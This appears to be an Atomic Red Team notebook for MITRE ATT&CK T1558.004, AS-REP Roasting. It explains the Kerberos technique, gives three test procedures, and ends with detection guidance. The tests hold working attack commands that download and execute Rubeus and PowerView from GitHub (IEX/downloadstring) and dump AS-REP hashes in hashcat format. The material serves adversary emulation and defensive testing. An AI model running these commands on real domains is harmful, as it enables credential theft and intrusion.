# T1558.004 - AS-REP Roasting
Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 

Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

## Atomic Tests

### Atomic Test #1 - Rubeus asreproast
Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```
##### Description: Rubeus must exist

##### Check Prereq Commands:
```powershell
if(Test-Path -Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-Webrequest -Uri https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe -OutFile PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe

```

In [ ]:
Invoke-AtomicTest T1558.004 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cmd.exe /c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asreproast /outfile:"PathToAtomicsFolder\..\ExternalPayloads\rubeus_output.txt"
```

In [ ]:
Invoke-AtomicTest T1558.004 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\rubeus_output.txt" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1558.004 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Get-DomainUser with PowerViewUtilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
```

In [ ]:
Invoke-AtomicTest T1558.004 -TestNumbers 2

### Atomic Test #3 - WinPwn - PowerSharpPack - Kerberoasting Using RubeusPowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"```

In [ ]:
Invoke-AtomicTest T1558.004 -TestNumbers 3

## Detection
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)